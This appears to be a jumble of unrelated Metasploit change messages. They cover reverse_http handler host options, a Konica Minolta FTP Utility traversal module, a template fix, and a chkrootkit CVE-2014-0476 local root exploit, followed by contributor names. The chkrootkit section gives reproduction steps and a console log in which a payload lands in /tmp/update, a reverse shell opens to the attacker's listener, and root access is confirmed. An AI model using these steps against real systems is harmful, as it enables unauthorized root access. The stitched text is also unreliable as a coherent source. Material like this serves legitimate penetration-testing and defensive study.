Pass in the "lhost" and "lport" options to the default transport during the native payload. This takes the following LHOST priorities:
1. OverrideLHOST, only if OverrideRequestHost is TRUE
2. The request Host: header.
3. The LHOST datastore.
Default transport request should set the priority to the Host: request header, and the subsequent OverrideRequestHost, OverrideLHOST, and OverrideLPORT options in the handler for reverse_http(s).
This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//
:template by default is just the base name of the file, not the
fullname. Before we use it, we need to normalize it. Methods
in this class rely on set_template_default for normalization (
which can also handle a custom path), so we'll just use that too.
Fix#6213
This modules implements an exploit for CVE-2014-0476,
to gain root thanks to chkrootkit.
Its main issues is that you need to wait until chkrootkit
is executed in a crontab (or manually),
which can take 24h top with its default setup.
How to reproduce:
1. Install a version < 0.50 of chkrootkit
2. Launch the local module
3. Wait until chkrootkit's crontab kicks in
4. You've got a root shell
```
msf > use exploit/linux/local/chkrootkit
msf exploit(chkrootkit) > check
[*] 192.168.1.25 - The target appears to be vulnerable.
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.
[*] Started reverse handler on 192.168.1.11:9999
msf exploit(chkrootkit) > [+] Target is vulnerable.
[!] Rooting depends of the crontab, this could take a while.
[*] Payload written to /tmp/update
[*] Waiting to chkrookit to be run be a cron tab...
[*] Command shell session 6 opened (192.168.1.11:9999 -> 192.168.1.25:40006) at 2015-11-06 20:53:00 +0100
[+] Deleted /tmp/update
msf exploit(chkrootkit) > sessions -i 6
[*] Starting interaction with 6...
id
uid=0(root) gid=0(root) groups=0(root)
```
Jon Hart
m0t
William Vu
sammbertram
jvoisin
JT
Louis Sato
wchen-r7
Brent Cook